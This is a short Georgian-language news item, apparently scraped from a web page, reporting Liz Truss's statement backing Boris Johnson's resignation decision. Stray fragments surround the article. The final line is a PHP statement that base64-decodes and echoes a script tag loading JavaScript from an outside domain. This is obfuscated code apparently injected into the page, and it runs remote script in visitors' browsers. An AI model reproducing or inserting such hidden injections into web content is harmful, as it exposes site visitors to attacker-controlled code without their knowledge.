celsiusi
ავერსი შნაიდერი

პრემიერ-მინისტრმა, ბორის ჯონსონმა სწორი გადაწყვეტილება მიიღო, – ამის შესახებ ბრიტანეთის საგარეო საქმეთა მინისტრმა, ლიზ ტრასმა განაცხადა.

ბრიტანეთის საგარეო უწყების ხელმძღვანელის თქმით, ქვეყანამ ახლა სიმშვიდე უნდა შეინარჩუნოს.

„პრემიერ-მინისტრმა სწორი გადაწყვეტილება მიიღო. ბორისის ხელმძღვანელობით მთავრობას ბევრი მიღწევა ჰქონდა –ბრექსითის უზრუნველყოფა, ვაქცინები და უკრაინის მხარდაჭერა. ახლა ჩვენ გვჭირდება სიმშვიდე, ერთიანობა და მართვის გაგრძელება, ვიდრე ახალი ლიდერი მოიძებნება“, – განაცხადა ლიზ ტრასმა.

შეგახსენებთ, რომ დიდი ბრიტანეთის პრემიერ-მინისტრმა ბორის ჯონსონმა დღეს თანამდებობა დატოვა. 

613
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");